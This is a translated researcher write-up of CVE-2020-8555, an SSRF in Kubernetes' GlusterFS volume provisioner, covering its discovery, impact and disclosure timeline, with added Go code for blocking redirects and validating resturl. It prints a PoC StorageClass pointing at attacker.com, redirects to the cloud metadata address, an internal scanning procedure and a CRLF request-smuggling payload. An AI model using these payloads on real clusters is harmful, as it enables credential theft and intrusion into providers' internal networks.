Translator's note: the authors of this article describe in detail how they managed to find the vulnerability
Who we are
We are two French security researchers who jointly discovered a vulnerability in Kubernetes. Our names are Brice Augras and Christophe Hauquiert, but on many Bug Bounty platforms we are known as Reeverzax and Hach respectively:
- Brice Augras, Groupe Asten;
- Christophe Hauquiert, Kubernetes builder at Nokia.
What happened?
This article is our way of sharing how an ordinary research project unexpectedly turned into the most exciting adventure in the lives of bug hunters (at least so far).
As you know, bug hunters have a couple of notable traits:
- they live on pizza and beer;
- they work when everyone else is asleep.
We are no exception to these rules: we usually meet on weekends and spend sleepless nights hacking. But one of those nights ended in a very unusual way.
Initially we were going to meet to discuss participating
At 11 p.m. we sat down to do some research and went to bed early in the morning, very satisfied with the results. It was thanks to this research that we came across the MSRC Bug Bounty program and came up with a privilege escalation exploit.
A few weeks/months passed, and our unexpected result led to one of the highest rewards in the history of the Azure Cloud Bug Bounty, in addition to the one we received from Kubernetes!
Based on our research project, the Kubernetes Product Security Committee published
Now I would like to spread information about the discovered vulnerability as widely as possible. We hope you enjoy the find and share the technical details with other members of the infosec community!
So here is our story...
Context
To make sense of what happened, let's first look at how Kubernetes works in a managed cloud environment.
When you deploy a Kubernetes cluster in such an environment, the management layer is usually the responsibility of the cloud provider:
The control plane resides within the cloud provider's perimeter, while the Kubernetes nodes reside within the customer's perimeter.
To allocate volumes dynamically, a mechanism is used that provisions them on the fly from an external storage backend and matches them to a PVC (persistent volume claim, i.e. a request for a volume).
So, once a PVC has been created and bound to a StorageClass in the K8s cluster, the further actions needed to provision the volume are taken by the kube/cloud controller manager (its exact name depends on the release). (Translator's note: we have written more about the CCM using the example of its implementation for one of the cloud providers
There are several types of provisioners supported by Kubernetes: most of them are included
In our research we focused on the internal volume provisioning mechanism, shown below:
Dynamic provisioning of volumes using the built-in Kubernetes provisioner
In short, when Kubernetes is deployed in a managed environment, the controller manager is the responsibility of the cloud provider, but the request to create the volume (number 3 in the diagram above) leaves the cloud provider's internal network. And this is where things get really interesting!
Hacking scenario
In this section we explain how we exploited the workflow mentioned above and gained access to the internal resources of the cloud service provider. It also shows how certain actions can be performed, such as obtaining internal credentials or escalating privileges.
One simple trick (in this case, Server Side Request Forgery) helped us break out of the client environment into the clusters of various service providers running managed K8s.
In our research we focused on the GlusterFS provisioner. Although the sequence of actions that follows is described in that context, Quobyte, StorageOS and ScaleIO are susceptible to the same vulnerability.
Abusing the dynamic volume provisioning mechanism
While analyzing the GlusterFS storage class in the Golang client source code, we noticed that /volumes is appended to the resturl parameter.
We decided to get rid of this extra path by appending # to the resturl parameter. Here is the first YAML configuration we used to test for a semi-blind SSRF vulnerability (you can read more about semi-blind, or half-blind, SSRF, for example,
apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
  name: poc-ssrf
provisioner: kubernetes.io/glusterfs
parameters:
  resturl: "http://attacker.com:6666/#"
---
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: poc-ssrf
spec:
  accessModes:
  - ReadWriteOnce
  volumeMode: Filesystem
  resources:
    requests:
      storage: 8Gi
  storageClassName: poc-ssrf
We then used the kubectl binary to manage the Kubernetes cluster remotely. Typically, cloud providers (Azure, Google, AWS, etc.) let you obtain credentials for use with this utility.
Thanks to this, I was able to apply my "special" file. Kube-controller-manager executed the resulting HTTP request:
kubectl create -f sc-poc.yaml
Response from the attacker's point of view
Shortly after this, we were also able to get the HTTP response from the target server via the describe pvc or get events commands of kubectl. And indeed: this default Kubernetes driver is far too verbose in its warnings/error messages...
Here is an example with a link to https://www.google.fr set as the resturl parameter:
kubectl describe pvc poc-ssrf
# or you can use kubectl get events
With this approach, we were limited to HTTP POST requests and could not retrieve the contents of the response body when the return code was 201. We therefore decided to research further and extend this hacking scenario with new approaches.
Evolution of our research
- Advanced scenario #1: Using a 302 redirect from an external server to change the HTTP method, giving a more flexible way of collecting internal data.
- Advanced scenario #2: Automating LAN scanning and internal resource discovery.
- Advanced scenario #3: Using HTTP CRLF + smuggling ("request smuggling") to craft tailored HTTP requests and retrieve the data extracted from the kube-controller logs.
Technical specifications
- The research used Azure Kubernetes Service (AKS) with Kubernetes version 1.12 in the North Europe region.
- The scenarios described above were executed on the latest Kubernetes release, except for the third, because it required Kubernetes built with Golang version ≤ 1.12.
- The attacker's external server: https://attacker.com.
Advanced scenario #1: Redirecting the HTTP POST request to GET and receiving sensitive data
The original method was improved by configuring the attacker's server to return a 302 HTTP redirect code, converting the POST request into a GET request (step 4 in the diagram):
The first request (3) coming from the GlusterFS client (controller manager) is of type POST. Following these steps we were able to turn it into a GET:
- The resturl parameter in the StorageClass is set to http://attacker.com/redirect.php.
- The endpoint https://attacker.com/redirect.php responds with HTTP status code 302 and the following Location header: http://169.254.169.254. This could be any other internal resource; in this case the redirect link is used only as an example.
- By default, Golang's net/http library follows the redirect and converts the POST into a GET on a 302 status code, resulting in an HTTP GET request to the target resource.
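The method rewrite in the last step is a property of Go's standard client, and the same client knob is also the defensive fix: a client that talks to operator-supplied URLs should refuse to follow redirects at all. The added example below is a test harness written for this article, not the authors' PoC or Kubernetes code; the paths /redirect and /target and the request body are constructed. It shows the stock client turning the POST into a GET at the redirect target, and the hardened client handing the 302 back instead.

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
	"strings"
	"sync"
)

// ProbeRedirect runs a local test server (constructed here, not a real
// provisioner) whose /redirect answers 302 with Location: /target and POSTs
// to it as a provisioner client would. It returns the method the final
// endpoint saw ("" if the redirect was not followed) and the client's status.
func ProbeRedirect(followRedirects bool) (string, int, error) {
	var mu sync.Mutex
	seen := ""
	mux := http.NewServeMux()
	mux.HandleFunc("/redirect", func(w http.ResponseWriter, r *http.Request) {
		http.Redirect(w, r, "/target", http.StatusFound) // 302 Found
	})
	mux.HandleFunc("/target", func(w http.ResponseWriter, r *http.Request) {
		mu.Lock()
		seen = r.Method // stock net/http rewrites POST to GET on 301/302/303
		mu.Unlock()
		w.WriteHeader(http.StatusOK)
	})
	srv := httptest.NewServer(mux)
	defer srv.Close()
	client := srv.Client()
	if !followRedirects { // hardened client: never chase operator-supplied redirects
		client.CheckRedirect = func(*http.Request, []*http.Request) error {
			return http.ErrUseLastResponse // hand the 302 back instead of following
		}
	}
	resp, err := client.Post(srv.URL+"/redirect", "application/json",
		strings.NewReader(`{"size":8}`)) // constructed request body
	if err != nil {
		return "", 0, err
	}
	resp.Body.Close()
	mu.Lock()
	defer mu.Unlock()
	return seen, resp.StatusCode, nil
}

func main() {
	m, s, err := ProbeRedirect(true)
	fmt.Println(m, s, err) // stock client: GET 200 <nil>
}
```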
To read the body of the HTTP response you need to describe the PVC object:
kubectl describe pvc xxx
Here is an example of an HTTP response in JSON format that we were able to obtain:
The capabilities of the vulnerability discovered at that point were limited by the following:
- Inability to inject HTTP headers into the outgoing request.
- Inability to perform a POST request with parameters in the body (this is convenient for requesting a key's value from an etcd instance on port 2379 when unencrypted HTTP is used).
- Inability to retrieve the response body contents when the status code was 200 and the response did not have a JSON Content-Type.
Advanced scenario #2: Scanning the local network
This semi-blind SSRF method was then used to scan the cloud provider's internal network and poll the various listening services (metadata instance, Kubelet, etc.) based on the responses of the kube controller.
First, the standard listening ports of Kubernetes components were determined (8443, 10250, 10251, etc.), and then the scanning process had to be automated.
Seeing that this resource scanning method is very specific and not compatible with classic scanners and SSRF tools, we decided to create our own workers in a bash script that automates the whole process.
For example, to quickly scan the 172.16.0.0/12 range of the internal network, 15 workers were launched in parallel. The above IP range was chosen only as an example and may need to change to your particular service provider's IP range.
To scan one IP address and one port, you need to do the following:
- delete the last tested StorageClass;
- delete the previously verified Persistent Volume Claim;
- change the IP and Port values in sc.yaml;
- create a StorageClass with the new IP and port;
- create a new PVC;
- extract the scan results using describe on the PVC.
Advanced scenario #3: CRLF injection + HTTP smuggling in "old" versions of the Kubernetes cluster
If, in addition, the provider offered customers old versions of the K8s cluster and gave them access to the kube-controller-manager logs, the effect became even more significant.
Indeed, it is much more convenient for an attacker to modify HTTP requests designed to get a full HTTP response at their discretion.
To implement the last scenario, the following conditions had to be met:
- The user must have access to the kube-controller-manager logs (for example, in Azure LogInsights).
- The Kubernetes cluster must use a Golang version below 1.12.
We deployed a local environment simulating the communication between the GlusterFS Go client and a fake target server (we will refrain from publishing the PoC for now).
Discovered
By combining the semi-blind SSRF described above with this, we were able to send requests at will, including replacing headers, the HTTP method, parameters and data, which kube-controller-manager then processed.
Here is an example of a working "bait" in the resturl parameter of the StorageClass, implementing a similar attack scenario:
http://172.31.X.1:10255/healthz? HTTP/1.1\r\nConnection: keep-alive\r\nHost: 172.31.X.1:10255\r\nContent-Length: 1\r\n\r\n1\r\nGET /pods? HTTP/1.1\r\nHost: 172.31.X.1:10255\r\n\r\n
The result is an unsolicited response error, a message about which is recorded in the controller log. Thanks to the verbosity enabled by default, the content of the HTTP response message is also stored there.
This was our most effective "bait" within the proof of concept.
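A defensive counterpart to the '#' trick in the resturl parameter (see the abuse section above) and to this CRLF payload is to validate the resturl value before kube-controller-manager ever sees it, for instance in a validating admission webhook on StorageClass objects. The following check is an added example written for this article, not the authors' code or the Kubernetes fix; the blocked address ranges and the allowlist argument are constructed placeholders to adapt to your own provider.

```go
package main

import (
	"fmt"
	"net"
	"net/url"
	"strings"
)

// Constructed blocklist: loopback, link-local (the cloud metadata service sits
// at 169.254.169.254) and RFC 1918 space. Adapt it to your provider's layout.
var blockedRanges = []string{"127.0.0.0/8", "169.254.0.0/16",
	"10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16"}

// ValidateRestURL is an admission-style check on a StorageClass resturl value. It
// rejects control bytes such as CR/LF (request smuggling), a '#' that turns the
// client's appended path into a fragment, and internal or non-allowlisted hosts.
func ValidateRestURL(raw string, allowedHosts []string) error {
	for _, r := range raw {
		if r < 0x20 || r == 0x7f {
			return fmt.Errorf("control character %q in resturl", r)
		}
	}
	// url.Parse silently drops an empty trailing fragment, so check the raw text.
	if strings.Contains(raw, "#") {
		return fmt.Errorf("fragment marker %q in resturl", "#")
	}
	u, err := url.Parse(raw)
	if err != nil {
		return err
	}
	if u.Scheme != "http" && u.Scheme != "https" {
		return fmt.Errorf("unsupported scheme %q", u.Scheme)
	}
	host := u.Hostname()
	if ip := net.ParseIP(host); ip != nil {
		for _, cidr := range blockedRanges {
			_, n, _ := net.ParseCIDR(cidr) // constants above are well-formed
			if n.Contains(ip) {
				return fmt.Errorf("host %s is in blocked range %s", host, cidr)
			}
		}
	}
	for _, h := range allowedHosts {
		if strings.EqualFold(h, host) {
			return nil
		}
	}
	return fmt.Errorf("host %q not in allowlist", host)
}
```

Hostname allowlisting does not stop a DNS name that resolves to an internal address, so the check belongs alongside network egress rules for the controller manager, not in place of them.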
Using this approach, we were able to carry out some of the following attacks on the clusters of various managed k8s providers: privilege escalation with credentials from metadata instances, master DoS via (unencrypted) HTTP requests on master etcd instances, etc.
Consequences
In the official Kubernetes statement regarding the SSRF vulnerability we discovered, it was rated CVSS 6.3/10: CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N. If we consider only the vulnerability related to the Kubernetes perimeter, the integrity vector qualifies as None.
However, assessing the possible consequences in the context of a managed service environment (and this was the most interesting part of our research!) prompted us to reclassify the vulnerability as Critical, CVSS 10/10, for many distributors.
Below is additional information to help you understand our reasoning when assessing possible impacts in cloud environments:
Integrity
- Execute commands remotely using the obtained internal credentials.
- Reproduce the above scenario using the IDOR (Insecure Direct Object Reference) method with other resources found on the local network.
Confidentiality
- Lateral Movement type attacks thanks to the theft of cloud credentials (for example, the metadata API).
- Collecting information by scanning the local network (determining the SSH version, HTTP server version, ...).
- Collecting instance and infrastructure information by polling internal APIs such as the metadata API (http://169.254.169.254, ...).
- Stealing customer data using cloud credentials.
Availability
All exploitation scenarios related to integrity attack vectors can be used for destructive actions and lead to instances from the client perimeter (or any other) becoming unavailable.
Since we were in a managed K8s environment and assessing the integrity impact, we can imagine many scenarios that could affect availability. Additional examples include corrupting the etcd database or making a critical call to the Kubernetes API.
Timeline
- December 6, 2019: Vulnerability reported to the MSRC Bug Bounty.
- January 3, 2020: A third-party company notified the Kubernetes engineers that we were working on a security issue and asked them to consider the SSRF an internal (in-core) vulnerability. We then provided a general report with technical details about the source of the problem.
- January 15, 2020: We provided technical and general reports to the Kubernetes developers at their request (via the HackerOne platform).
- January 15, 2020: The Kubernetes developers notified us that the blind SSRF + CRLF injection for the previous release was considered an in-core vulnerability. We immediately stopped analyzing the perimeters of other service providers: the K8s team was now dealing with the root cause.
- January 15, 2020: MSRC reward received via HackerOne.
- January 16, 2020: Kubernetes PSC (Product Security Committee) acknowledged the vulnerability and asked that it be kept confidential until mid-March because of the large number of potential victims.
- February 11, 2020: Google VRP reward received.
- March 4, 2020: Kubernetes reward received via HackerOne.
- March 15, 2020: Originally planned public disclosure postponed due to the COVID-19 situation.
- June 1, 2020: Joint Kubernetes + Microsoft statement on the vulnerability.
TL;DR
- We drink beer and eat pizza :)
- We discovered an in-core vulnerability in Kubernetes, although we had no intention of doing so.
- We performed additional analysis on the clusters of various cloud providers and were able to increase the damage caused by the vulnerability in order to receive remarkable bounties.
- You will find plenty of technical details in this article. We would be happy to discuss them with you (Twitter: @ReeverZax & @__hach_).
- It turned out that all kinds of procedures and reporting took much longer than expected.
References
- Google group kubernetes-security-announce;
- CVE-2020-8555;
- Issue #30794;
- heketi/client/api/go-client/volume.go.
P.S. from the translator
Read also on our blog:
- "Kubernetes bug hunting is officially open";
- "Escaping a Kubernetes pod via log injection";
- "33+ Kubernetes security tools".
Source: www.habr.com